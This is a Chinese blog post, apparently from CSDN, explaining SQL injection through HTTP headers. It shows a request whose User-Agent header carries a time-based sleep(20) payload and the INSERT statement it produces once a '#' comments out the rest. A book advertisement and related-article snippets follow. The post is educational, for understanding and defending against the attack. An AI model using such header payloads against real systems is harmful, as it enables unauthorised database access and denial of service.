基于HTTP头部的注入

最新推荐文章于 2024-08-10 01:09:26 发布
最新推荐文章于 2024-08-10 01:09:26 发布
阅读量1.2w 收藏 6
点赞数 2
文章标签: sql注入 http头部 注入 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyangzhizhou/article/details/51656846
版权

基于HTTP头部的注入

常见的sql注入一般都是通过表单或请求参数进行注入,但这里给出的例子是通过HTTP协议头部进行注入。

例如一个的请求如下:

GET / HTTP/1.1
Host: www.example.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0'(select*from(select(sleep(20)))a) #
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6

这里看起来都很正常,但仔细看HTTP协议的User-Agent头部为“Mozilla/5.0’(select*from(select(sleep(20)))a) #”。其中“select * from (select(sleep(20)))”是不正常的,可能是攻击者正在注入攻击。

这里的攻击主要是让数据库什么也不干而睡眠20秒,从而浪费数据库处理线程。这是一个简单的注入,除此之外还能进行更多复杂的攻击。

一般获取头部的信息用于数据分析,例如这里获取User-Agent就可以知道客户都是通过什么浏览器访问系统的。jsp中直接通过request.getHeader("User-Agent")就可以获取到该值,接着可能就直接保存到数据库了,Mozilla/5.0’(select*from(select(sleep(20)))a) #中的#号在数据库中作为注释符号,它产生的sql可能如下:

INSERT INTO visits (useragent, datetime) VALUES ('Mozilla/5.0', (select*from(select(sleep(20)))a)) #', '2016-06-13 13:00:06')

这时#号后面都被注释掉了,于是数据库睡眠了20秒。

========广告时间========

鄙人的新书《Tomcat内核设计剖析》已经在京东销售了,有需要的朋友可以到 https://item.jd.com/12185360.html 进行预定。感谢各位朋友。

为什么写《Tomcat内核设计剖析》

=========================

欢迎关注:

这里写图片描述

超人汪小建(seaboat)
关注
【漏洞挖掘】——119、HTTP头部注入介绍
Fly_鹏程万里
06-27 184
User-Agent:使得服务器能够识别客户使用的操作系统,游览器版本(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据中)Cookie:网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])Clien-IP:同上。
掌控安全 -- header注入
qq_53058639的博客
07-07 621
header中获取客户端的一些信息(比如useragent用户代理等其他httpheader字段信息),因为这些信息是会重新返回拼接到后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入。**总结就是:在传参时,后端为了验证或者获取的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了header注入
head 注入
晨辰.的博客
03-21 5467
Head 注入
什么是脚本?
最新发布
la1466128339的博客
08-10 356
1. 计算机脚本:在计算机编程中,脚本是一种自动化的程序,通常由一系列命令组成,用于执行特定的任务。脚本(Script)这个词在不同的上下文中有不同的含义,但通常指的是一系列指令或程序,用于自动化或半自动化地执行任务。3. 用户脚本:如前所述,用户脚本是运行在浏览器扩展(如Tampermonkey)上的小型JavaScript程序,用于修改网页的行为或外观。8. 数据库脚本:在数据库管理中,脚本可能指包含一系列SQL语句的文件,用于执行数据库操作,如创建表、插入数据等。
网络安全——HTTP头部注入
weixin_54055099的博客
09-16 7612
SQL注入HTTP头部注入,两个例子:Use-Agent注入、XFF注入
HTTP注入
→_→
07-16 1231
重新认识被人遗忘的HTTP注入 前言 注入类漏洞经久不衰,多年保持在owasp Top 10的首位。今天就聊聊那些被人遗忘的http注入。用简单的实际代码进行演示,让每个人更深刻的去认识该漏洞。 HOST注入 在以往http1.0中并没有host字段,但是在http1.1中增加了host字段,并且http协议在本质也是要建立tcp连接,而建立连接的同时必须知道对方的ip和端口,然后才能发送数据。既然已经建立了连接,那host字段到底起着什么样的的作用? Host头域指定请求资源的Intene.
head头部注入、宽字节注入
qq_43238111的博客
05-24 479
head头部注入 原理 在传递参数时,利用请求头部参数传递参数,变成构造sql语句,然后发送执行sql语句 超全局变量是: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) $_SERVER功能强大。
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2574
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
MYSQL HTTP头部注入
AaronLuo
09-06 594
HTTP头部基础 Accept : 浏览器能够处理的内容类型 Accept-Charset : 浏览器能够显示的字符集 Accept-Encoding : 浏览器能处理的压缩编码 Accept-Language : 浏览器当前设置的语言 Connection : 浏览器与服务器之间的连接 cookie : 当前页面设置的cookie Host : 发出请求的页面所在域 Referer : 发出请求...
HTTP头部注入
shangMD01的博客
02-18 3235
实验环境 攻击机:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件HackBar等 靶机:SQLi-Labs 安装应用软件:apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境 实验步骤 1.访问SQLi-Labs网站 访问靶机SQLi-Labs上的Less-11: http://靶机ip/sql/Less-18 2.利用Burpsuite工具爪包 (1)启动Burpsuite (2)设置Burpsui.
SQL注入-http头部注入
xdjxi的博客
02-18 560
实验目的 理解HTTP头部字段User-Agent,Referer,Cookie,X-Forwarded等的含义和作用,掌握HTTP头部注入的原理,方法和基本流程, 实验步骤 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-18/ 2 利用Burpsuite工具抓包 (1)启动 Burpsuite (2)设置Burpsuite代理服务端口 (3)开启Burpsuite代理拦截功能 4 设置火狐代理 ...
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http头部注入相关
m0_54899775的博客
12-19 1434
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http头部注入相关 sqlilabs Less-18、Less-19、Less-20、Less-21、Less-22
sql注入--10http注入
技术骨干小李的博客
07-27 643
**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基本上不需要连接,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都会自动完成,并且可能使用不
24-4 SQL 注入 - http注入之referer注入
weixin_43263566的博客
02-28 420
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
sql注入HTTP头部注入
hhhshd的博客
11-14 3825
HTTP头部注入 原理: 一般在通过获取头部的信息用于数据的分析,通过头部可以向数据库发送查询信息,所以构造恶意的语句结构就可以向数据库进行信息查询。本次HTTP头部注入实验将在sqlilabs靶场中的第十八题进行注入 此图片为sqlilabs靶场中第十八题中的php代码环境,从代码环境中,我们可以分析到对于Post注入方式,还是通过魔术引号的方式进行了防护,但是在红框中的代码却露出了马脚 $ uagent = $_SERVER [‘HTTP_USER_AGENT’]; $ IP = $_SERVER
SQL注入HTTP头部注入
QYbkx974的博客
11-07 314
1.堆叠查询2.宽字节注入3.Cookie 注入4.base64 注入5.User-Agent 注入6.referer 注入
head注入(三)
qq_45300786的博客
07-06 695
在平时上网冲浪中,我们经常去访问一起网站,比如我们经常访问的百度 但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉, 那么就有很多台服务器来处理这些请求,以此来满足用户的需求, 1、通过代理来找到离用户最近的服务器。 你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据 服务器只会记录下代理商的ip,而不会记录下你的ip,这就会使得灭有你的ip 为了解决这一问题,X-Forwarded-For就出现了,用来记录你的ip, 然后代理商会在自己的数
注入全方位利用-POST注入HEAD头注入
weixin_30379911的博客
08-04 689
注入全方位利用-POST注入HEAD头注入 一、POST注入介绍 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 POST注入属于注入的一种,相信大家都知道POST\GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 ...
渗透测试——HTTP头部注入
zjdda的博客
05-21 6752
1.head头部注入实战 对http://injectx1.lab.aqlab.cn:81/ 靶场的pass-08-10进行head头部注入,获得flag 环境:靶场 1.pass-08 1).开启代理模式,使用用户:admin;密码:123456进行登录,使用burp抓包 2).使用’or sleep(5),1)#判断注入点;响应时间为5秒,确认注入点。 3).使用报错注入爆数据库名:head_error 参考文章:https://blog.csdn.net/zjdda/article/detail
SQL注入实战:SQLi-Labs完全攻略
它包含了MySQL注入的基础知识、盲注技巧、数据导入导出操作、增删改函数的使用、HTTP头部的理解以及服务器架构、宽字节注入和堆叠注入等高级主题。" 这篇文档详细介绍了SQL注入的概念和实践,特别关注了SQLi-Labs这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

超人汪小建(seaboat)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值